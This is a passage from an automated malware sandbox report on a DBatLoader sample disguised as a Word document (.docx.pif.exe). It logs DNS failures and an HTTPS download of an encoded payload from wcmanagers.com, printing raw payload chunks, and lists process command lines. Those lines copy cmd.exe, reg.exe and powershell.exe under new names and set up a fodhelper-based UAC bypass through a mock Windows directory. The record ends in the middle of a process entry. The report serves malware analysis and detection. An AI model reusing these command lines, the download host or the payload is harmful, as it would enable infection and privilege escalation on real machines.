                                                                            Jul 3, 2024 08:59:48.360872984 CEST1.1.1.1192.168.2.70xcf8aName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:53.302922964 CEST1.1.1.1192.168.2.70x650Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 08:59:58.342658997 CEST1.1.1.1192.168.2.70xf35eName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:03.304307938 CEST1.1.1.1192.168.2.70xd7ecName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:08.303471088 CEST1.1.1.1192.168.2.70xe10Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:13.306945086 CEST1.1.1.1192.168.2.70x6cbName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:18.303373098 CEST1.1.1.1192.168.2.70x1ce0Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:23.583026886 CEST1.1.1.1192.168.2.70x3ba0Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:28.304403067 CEST1.1.1.1192.168.2.70xda09Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:33.329210043 CEST1.1.1.1192.168.2.70x2f0dName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:38.303339958 CEST1.1.1.1192.168.2.70x4bebName error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:43.304078102 CEST1.1.1.1192.168.2.70xedb4Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:48.305927038 CEST1.1.1.1192.168.2.70x7473Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:53.303270102 CEST1.1.1.1192.168.2.70x2869Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false
                                                                            Jul 3, 2024 09:00:59.892136097 CEST1.1.1.1192.168.2.70x30e6Name error (3)www.vipguyclassproject2024.spacenonenoneA (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • wcmanagers.com

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.749700108.170.55.2024434220C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-03 06:56:52 UTC167OUTGET /Er9/233_Pyemdbrdpps HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: wcmanagers.com
                                                                            2024-07-03 06:56:52 UTC365INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            last-modified: Sun, 30 Jun 2024 22:39:58 GMT
                                                                            accept-ranges: bytes
                                                                            content-length: 1071492
                                                                            date: Wed, 03 Jul 2024 06:56:52 GMT
                                                                            server: LiteSpeed
                                                                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                            2024-07-03 06:56:52 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 58 47 68 6f 66 48 42 38 62 49 77 38 6a 46 69 59 50 45 78 49 69 44 78 45 6a 46 69 51 67 48 51 38 50 49 52 51 62 4a 79 63 53 47 52 34 6c 46 42 49 6e 4a 69 59 69 49 42 51 6a 48 78 4d 4f 4a 42 51 69 48 71 61 75 70 56 6b 6a 70 37 46 4c 2f 53 59 53 47 68 45 50 48 78 45 64 48 53 43 6d 72 71 56 5a 49 36 65 78 53 32 42 66 58 33 68 64 65 46 78 30 61 48 52 6a 63 32 68 6b 5a 33 64 6f 5a 6e 52 6a 64 58 6c 36 61 47 68 32 5a 56 78 77 63 47 64 65 65 33 4a 6c 5a 33 42 7a 63 33 64 35 5a 58 52 34 5a 47 74 31 5a 58 64 37 59 46 39 66 65 46 31 34 58 48 52 6f 64 47 4e 7a 61 47 52 6e 64 32 68 6d 64 47 4e 31 65 58 70 6f 61 48 5a 6c 58 48 42 77 5a 31 35 37 63 6d 56 6e 63 48 4e 7a 64 33 6c 6c 64 48 68 6b 61 33 56 6c 64 33 74 67 58 31 39 34 58 58 68
                                                                            Data Ascii: pq6lWSOnsUsXGhofHB8bIw8jFiYPExIiDxEjFiQgHQ8PIRQbJycSGR4lFBInJiYiIBQjHxMOJBQiHqaupVkjp7FL/SYSGhEPHxEdHSCmrqVZI6exS2BfX3hdeFx0aHRjc2hkZ3doZnRjdXl6aGh2ZVxwcGdee3JlZ3Bzc3d5ZXR4ZGt1ZXd7YF9feF14XHRodGNzaGRnd2hmdGN1eXpoaHZlXHBwZ157cmVncHNzd3lldHhka3Vld3tgX194XXh
                                                                            2024-07-03 06:56:52 UTC16384INData Raw: 78 4c 61 72 46 70 49 67 4d 47 53 41 4b 44 63 37 77 2f 70 79 42 64 42 55 75 67 43 2b 73 45 4e 6d 2b 30 34 51 66 62 39 39 69 63 37 44 6d 38 53 5a 6d 45 43 75 43 44 47 42 51 73 6b 69 33 56 74 4c 39 59 74 37 77 76 78 67 75 47 4c 68 73 61 41 79 56 69 77 42 4c 68 6d 6e 41 32 6a 72 77 54 56 38 73 4c 56 70 71 4b 52 4b 62 35 75 63 64 6f 53 5a 39 51 39 62 64 33 52 54 36 6e 36 73 50 4e 51 50 72 68 6f 69 74 49 63 73 44 4e 59 72 65 4a 6f 62 4e 67 6b 6c 50 65 76 66 63 33 4f 55 66 34 59 70 4e 30 73 7a 74 5a 70 49 31 51 4e 73 6a 7a 30 67 6f 54 53 57 4a 65 6f 55 34 67 55 66 6a 56 42 2b 6a 2f 44 74 61 67 79 71 37 64 34 37 58 59 7a 63 75 31 48 46 4c 55 74 43 6d 53 73 58 44 35 58 35 44 65 37 4e 57 78 38 56 75 5a 68 79 46 62 39 34 32 6f 2b 6a 78 6c 72 43 4e 70 47 54 59 75 50
                                                                            Data Ascii: xLarFpIgMGSAKDc7w/pyBdBUugC+sENm+04Qfb99ic7Dm8SZmECuCDGBQski3VtL9Yt7wvxguGLhsaAyViwBLhmnA2jrwTV8sLVpqKRKb5ucdoSZ9Q9bd3RT6n6sPNQPrhoitIcsDNYreJobNgklPevfc3OUf4YpN0sztZpI1QNsjz0goTSWJeoU4gUfjVB+j/Dtagyq7d47XYzcu1HFLUtCmSsXD5X5De7NWx8VuZhyFb942o+jxlrCNpGTYuP
                                                                            2024-07-03 06:56:52 UTC16384INData Raw: 6e 56 6d 62 59 46 45 79 44 58 4a 34 71 63 70 62 31 6c 76 31 79 78 67 70 35 37 47 35 37 55 35 54 5a 44 36 4c 6d 76 45 75 45 51 6b 4e 47 57 43 55 45 65 68 71 76 55 70 6c 68 63 77 52 78 31 30 30 70 33 45 4b 62 46 70 43 35 6e 6d 62 63 57 62 42 42 48 74 67 6a 7a 2f 55 41 63 71 6d 4e 68 6c 4b 54 59 6e 4f 63 4b 51 43 69 49 56 4c 34 6b 55 50 74 4b 51 71 6a 43 4b 4c 6c 66 6d 77 64 33 49 65 65 6a 47 44 75 5a 52 4d 63 56 54 49 59 41 4b 46 65 79 64 30 77 64 42 69 32 4f 49 64 52 50 35 59 37 52 65 4a 4a 46 36 74 4e 56 33 57 64 46 79 67 77 74 4b 47 77 74 35 43 42 69 56 39 73 69 33 43 59 36 53 2b 37 35 48 37 6a 38 66 32 32 79 48 48 50 45 69 4a 52 39 33 69 4a 42 6f 30 51 47 75 61 35 59 7a 4e 42 6e 43 69 31 56 79 68 67 35 2f 4d 57 30 30 59 4b 50 2b 2f 63 47 55 32 67 48 78
                                                                            Data Ascii: nVmbYFEyDXJ4qcpb1lv1yxgp57G57U5TZD6LmvEuEQkNGWCUEehqvUplhcwRx100p3EKbFpC5nmbcWbBBHtgjz/UAcqmNhlKTYnOcKQCiIVL4kUPtKQqjCKLlfmwd3IeejGDuZRMcVTIYAKFeyd0wdBi2OIdRP5Y7ReJJF6tNV3WdFygwtKGwt5CBiV9si3CY6S+75H7j8f22yHHPEiJR93iJBo0QGua5YzNBnCi1Vyhg5/MW00YKP+/cGU2gHx
                                                                            2024-07-03 06:56:52 UTC16384INData Raw: 6b 6c 55 5a 4a 2b 5a 30 74 30 71 47 56 4e 51 74 57 43 43 57 43 4e 39 73 44 57 52 4f 6d 6d 6b 34 53 69 76 4c 4a 38 4c 6b 50 6f 77 58 4a 75 68 61 41 39 36 41 50 78 2b 6c 58 44 6e 4a 59 74 6e 69 36 49 55 58 67 59 71 72 4d 57 61 6d 31 58 2f 68 4e 41 57 6e 57 4a 6b 53 54 65 37 48 43 69 67 4e 74 2b 59 33 75 6e 6c 38 77 74 47 57 33 4c 30 30 71 56 4f 4f 39 42 43 37 4a 38 59 79 6d 71 44 44 72 66 72 41 72 69 51 76 34 4d 76 46 4d 42 75 41 4d 30 57 63 79 6d 33 4e 62 6a 78 71 78 63 78 4a 58 6b 44 56 4d 45 45 6e 56 44 69 59 50 35 4e 7a 70 47 63 76 6f 62 54 66 4f 67 6d 2b 79 47 31 62 33 73 34 4f 46 61 74 79 44 31 53 32 51 57 45 64 34 33 53 47 76 46 47 6a 53 4b 54 6b 2f 34 4a 64 54 55 31 74 57 6e 7a 35 4f 49 65 57 2b 39 2b 37 58 43 37 34 66 79 46 30 61 52 32 55 55 74 54
                                                                            Data Ascii: klUZJ+Z0t0qGVNQtWCCWCN9sDWROmmk4SivLJ8LkPowXJuhaA96APx+lXDnJYtni6IUXgYqrMWam1X/hNAWnWJkSTe7HCigNt+Y3unl8wtGW3L00qVOO9BC7J8YymqDDrfrAriQv4MvFMBuAM0Wcym3NbjxqxcxJXkDVMEEnVDiYP5NzpGcvobTfOgm+yG1b3s4OFatyD1S2QWEd43SGvFGjSKTk/4JdTU1tWnz5OIeW+9+7XC74fyF0aR2UUtT
                                                                            2024-07-03 06:56:52 UTC16384INData Raw: 6b 4d 75 79 6f 4d 46 65 42 37 62 32 53 56 6f 77 46 55 42 68 39 39 53 52 30 38 75 76 34 2f 47 46 6e 4e 67 5a 36 75 78 66 36 78 6c 4f 47 69 7a 62 44 59 4f 75 67 70 49 46 6c 2f 63 6e 59 42 53 73 6b 65 64 7a 76 6c 79 4f 70 5a 66 33 4b 5a 6b 54 57 63 70 56 69 57 43 2f 73 5a 47 7a 2f 33 32 49 67 41 66 48 5a 78 4c 71 6d 62 35 4b 4b 43 6d 2b 6c 79 36 56 31 55 4f 54 6c 58 6f 33 6a 58 71 30 4a 69 4b 52 6a 58 62 49 4f 37 48 54 41 45 33 61 6f 73 62 44 38 64 31 74 78 37 45 6c 36 74 31 72 73 6c 73 6e 55 62 61 73 71 71 66 68 77 6c 6b 65 71 74 41 6d 34 78 77 36 35 30 4a 35 39 42 6f 4a 31 56 77 30 56 36 33 42 6f 4a 34 41 2f 30 31 69 6c 72 70 61 5a 50 38 44 43 4b 6d 77 74 75 49 50 42 6c 41 6d 74 6f 30 39 67 77 41 39 53 57 54 2f 57 75 57 6d 65 59 36 37 44 4f 6b 34 4c 2b 68
                                                                            Data Ascii: kMuyoMFeB7b2SVowFUBh99SR08uv4/GFnNgZ6uxf6xlOGizbDYOugpIFl/cnYBSskedzvlyOpZf3KZkTWcpViWC/sZGz/32IgAfHZxLqmb5KKCm+ly6V1UOTlXo3jXq0JiKRjXbIO7HTAE3aosbD8d1tx7El6t1rslsnUbasqqfhwlkeqtAm4xw650J59BoJ1Vw0V63BoJ4A/01ilrpaZP8DCKmwtuIPBlAmto09gwA9SWT/WuWmeY67DOk4L+h
                                                                            2024-07-03 06:56:52 UTC16384INData Raw: 5a 75 6f 46 4b 6f 48 2b 71 6a 37 79 6c 43 74 2f 4a 66 55 61 32 45 48 58 4a 6d 31 38 67 54 73 39 77 78 52 64 70 76 59 30 54 35 43 70 65 77 49 56 61 73 52 78 4a 33 72 73 32 6f 75 38 78 71 50 5a 56 45 71 73 64 47 70 55 76 46 30 7a 4f 68 75 33 39 72 66 2f 30 68 43 66 31 70 62 74 71 59 6d 44 78 47 4e 5a 78 2f 48 6d 42 76 66 39 4a 77 31 36 43 48 70 34 72 69 46 74 62 71 4b 59 33 4e 59 56 31 61 6f 36 7a 67 78 35 6f 2b 6a 51 4d 4e 6d 69 72 77 42 6d 6f 44 6f 73 38 55 4a 6c 37 79 57 6e 49 53 4e 6e 57 6b 6e 46 51 38 52 31 6f 38 46 46 43 32 6e 55 6a 34 58 7a 6f 41 64 39 6a 75 6b 79 6e 32 6e 6f 57 2f 53 46 4f 77 51 66 4a 37 4b 71 49 46 4c 4d 47 5a 34 58 36 53 35 53 46 68 73 31 30 70 67 55 75 61 52 38 4b 6f 50 57 57 4d 61 58 46 45 31 35 34 45 46 71 43 6a 58 51 53 4f 4f
                                                                            Data Ascii: ZuoFKoH+qj7ylCt/JfUa2EHXJm18gTs9wxRdpvY0T5CpewIVasRxJ3rs2ou8xqPZVEqsdGpUvF0zOhu39rf/0hCf1pbtqYmDxGNZx/HmBvf9Jw16CHp4riFtbqKY3NYV1ao6zgx5o+jQMNmirwBmoDos8UJl7yWnISNnWknFQ8R1o8FFC2nUj4XzoAd9jukyn2noW/SFOwQfJ7KqIFLMGZ4X6S5SFhs10pgUuaR8KoPWWMaXFE154EFqCjXQSOO
                                                                            2024-07-03 06:56:52 UTC16384INData Raw: 58 42 55 6a 64 64 58 70 44 74 6a 6b 46 50 38 68 69 51 43 4a 78 36 4d 54 47 52 4e 61 2f 6a 4c 4d 6f 7a 56 59 6f 36 56 79 53 4f 78 2f 38 77 4e 67 4d 6e 6a 65 37 31 70 48 6d 54 44 68 7a 64 4f 55 6e 37 57 78 73 4f 56 69 63 61 79 75 4b 50 42 6b 6b 32 4d 61 57 52 63 6a 55 57 30 7a 4d 42 33 45 76 42 38 2b 59 31 61 41 5a 2b 5a 70 54 39 70 65 4b 79 4b 43 38 58 5a 35 45 4f 32 63 43 30 6b 59 77 64 4c 62 39 2f 62 5a 54 79 53 49 6c 50 5a 61 69 43 59 45 6f 44 66 48 77 54 36 52 66 43 64 73 51 6c 57 6c 58 72 32 30 47 51 70 6b 55 41 43 63 64 4e 61 55 78 63 4f 50 53 34 4d 6b 4a 55 6b 43 52 70 74 79 38 56 49 79 57 71 59 54 4a 4a 61 39 6f 43 4c 37 30 70 68 47 61 6a 79 69 44 79 31 42 44 41 65 4f 31 54 43 6f 75 76 66 4c 6b 67 37 58 39 38 46 33 41 59 76 77 36 73 72 42 46 77 2f
                                                                            Data Ascii: XBUjddXpDtjkFP8hiQCJx6MTGRNa/jLMozVYo6VySOx/8wNgMnje71pHmTDhzdOUn7WxsOVicayuKPBkk2MaWRcjUW0zMB3EvB8+Y1aAZ+ZpT9peKyKC8XZ5EO2cC0kYwdLb9/bZTySIlPZaiCYEoDfHwT6RfCdsQlWlXr20GQpkUACcdNaUxcOPS4MkJUkCRpty8VIyWqYTJJa9oCL70phGajyiDy1BDAeO1TCouvfLkg7X98F3AYvw6srBFw/
                                                                            2024-07-03 06:56:52 UTC16384INData Raw: 46 4a 62 46 4d 71 45 4a 4d 64 67 62 50 46 67 62 4f 4f 43 50 79 6e 76 79 37 35 6b 73 64 55 77 63 31 62 74 62 79 6e 5a 79 4d 54 73 52 6b 37 73 6c 68 65 6a 6b 50 32 6c 70 75 54 41 63 46 72 49 4e 55 49 67 32 57 47 75 70 69 30 69 4b 5a 4a 35 6a 79 45 51 35 50 42 35 7a 79 6c 43 70 45 6a 50 70 6f 76 50 56 63 4f 49 5a 61 6b 4e 69 52 58 47 32 51 69 41 75 56 62 63 75 49 33 6e 6a 4b 72 51 43 2b 76 38 52 72 39 51 43 61 4c 65 52 61 45 55 39 35 44 4e 2b 41 78 38 4d 48 73 64 6c 34 30 74 64 78 36 43 7a 73 33 4a 6d 6f 62 58 64 72 70 49 2b 4e 74 65 79 79 73 58 79 61 54 66 38 42 36 36 78 4e 51 71 53 37 2b 41 43 46 43 37 4d 46 74 57 71 63 49 33 66 43 52 77 31 32 68 62 2f 68 4f 57 51 42 44 4e 6a 45 63 47 51 72 79 76 38 4e 35 53 63 58 78 6f 6e 79 46 6a 6a 7a 4c 54 2f 37 2b 42
                                                                            Data Ascii: FJbFMqEJMdgbPFgbOOCPynvy75ksdUwc1btbynZyMTsRk7slhejkP2lpuTAcFrINUIg2WGupi0iKZJ5jyEQ5PB5zylCpEjPpovPVcOIZakNiRXG2QiAuVbcuI3njKrQC+v8Rr9QCaLeRaEU95DN+Ax8MHsdl40tdx6Czs3JmobXdrpI+NteyysXyaTf8B66xNQqS7+ACFC7MFtWqcI3fCRw12hb/hOWQBDNjEcGQryv8N5ScXxonyFjjzLT/7+B
                                                                            2024-07-03 06:56:52 UTC16384INData Raw: 77 56 59 76 38 66 35 64 43 4e 30 71 45 63 62 70 59 61 6f 36 30 36 4a 46 53 2f 4f 35 58 31 2b 48 44 4a 6a 58 49 2b 54 52 75 76 79 74 30 41 49 79 79 64 50 67 54 2b 35 44 45 37 48 57 64 4c 47 4d 70 4f 58 4c 71 76 37 41 42 54 58 77 6e 31 6f 52 72 72 45 79 62 74 63 4c 73 4e 6f 30 76 6a 68 78 64 70 6f 68 57 36 57 6f 6f 77 4c 2b 39 4a 73 4d 39 6d 69 2f 6a 50 35 6b 36 75 45 51 61 4c 30 42 51 44 44 37 4c 31 71 72 55 7a 4a 66 64 37 36 42 64 75 7a 33 44 48 75 43 38 55 6b 30 2b 43 49 69 58 78 72 44 52 7a 35 34 6f 79 77 4c 4c 4f 70 4d 30 68 46 62 5a 6c 71 4a 75 6b 68 79 5a 4c 6c 48 50 58 4d 54 7a 70 2f 75 43 59 6d 4f 54 6f 38 6b 49 2b 73 63 73 36 4b 4a 2b 53 63 70 46 59 39 4a 37 30 61 48 58 62 31 4f 42 33 35 5a 4c 35 56 51 55 6b 49 4e 6c 4d 44 50 45 52 42 41 74 34 5a
                                                                            Data Ascii: wVYv8f5dCN0qEcbpYao606JFS/O5X1+HDJjXI+TRuvyt0AIyydPgT+5DE7HWdLGMpOXLqv7ABTXwn1oRrrEybtcLsNo0vjhxdpohW6WoowL+9JsM9mi/jP5k6uEQaL0BQDD7L1qrUzJfd76Bduz3DHuC8Uk0+CIiXxrDRz54oywLLOpM0hFbZlqJukhyZLlHPXMTzp/uCYmOTo8kI+scs6KJ+ScpFY9J70aHXb1OB35ZL5VQUkINlMDPERBAt4Z
                                                                            2024-07-03 06:56:52 UTC16384INData Raw: 41 44 48 73 73 73 4e 68 69 71 4f 34 70 48 31 76 53 4a 63 44 51 48 56 4e 2f 68 31 48 2f 49 75 48 65 76 79 37 4d 49 64 6a 38 63 70 42 4d 4f 41 79 31 48 74 6e 51 6c 67 59 77 6d 42 7a 38 6f 2f 43 79 70 7a 39 48 79 33 75 52 2f 42 78 54 4c 49 6e 4e 64 79 30 75 31 66 49 55 41 59 5a 41 45 77 37 58 53 58 56 55 2b 4e 31 74 34 51 42 57 2b 2b 7a 32 4e 39 35 62 31 68 69 6a 70 32 49 6d 48 58 34 41 62 47 68 6a 6e 78 64 56 69 74 6b 41 46 48 73 6e 46 32 73 68 62 50 47 31 4f 51 39 79 44 55 4b 2b 41 4d 42 35 64 69 4c 61 2f 5a 73 50 63 51 52 74 2b 39 39 57 63 51 6e 4e 78 6a 50 52 52 62 4d 75 34 34 43 47 43 75 69 5a 49 45 43 61 47 43 50 41 44 79 4e 73 61 48 68 45 46 45 62 47 56 68 47 34 78 4f 7a 49 50 38 7a 76 74 43 55 56 54 6d 51 4d 72 4d 4a 57 70 48 52 65 6a 36 53 4f 36 74
                                                                            Data Ascii: ADHsssNhiqO4pH1vSJcDQHVN/h1H/IuHevy7MIdj8cpBMOAy1HtnQlgYwmBz8o/Cypz9Hy3uR/BxTLInNdy0u1fIUAYZAEw7XSXVU+N1t4QBW++z2N95b1hijp2ImHX4AbGhjnxdVitkAFHsnF2shbPG1OQ9yDUK+AMB5diLa/ZsPcQRt+99WcQnNxjPRRbMu44CGCuiZIECaGCPADyNsaHhEFEbGVhG4xOzIP8zvtCUVTmQMrMJWpHRej6SO6t


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:02:56:48
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'085'440 bytes
                                                                            MD5 hash:B9DA5A47E1E68EF90C075DC14F8E2037
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\Libraries\drbdmeyP.pif
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\Public\Libraries\drbdmeyP.pif
                                                                            Imagebase:0x400000
                                                                            File size:68'096 bytes
                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 3%, ReversingLabs
                                                                            • Detection: 0%, Virustotal, Browse
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:4
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
                                                                            Imagebase:0x7ff7b1750000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff75da10000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:6
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                            Imagebase:0x7ff669ec0000
                                                                            File size:35'328 bytes
                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:8
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            • Detection: 0%, Virustotal, Browse
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:10
                                                                            Start time:02:56:53
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:12
                                                                            Start time:02:56:54
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:13
                                                                            Start time:02:56:54
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
                                                                            Imagebase:0x7ff669ec0000
                                                                            File size:35'328 bytes
                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:14
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:15
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                                                                            Imagebase:0x7ff669ec0000
                                                                            File size:35'328 bytes
                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:17
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                                                                            Imagebase:0x7ff64b560000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:18
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                                                                            Imagebase:0x7ff669ec0000
                                                                            File size:35'328 bytes
                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:21
                                                                            Start time:02:56:55
                                                                            Start date:03/07/2024
                                                                            Path:C:\Users\Public\alpha.exe
                                                                            Wow64 process (32bit):false
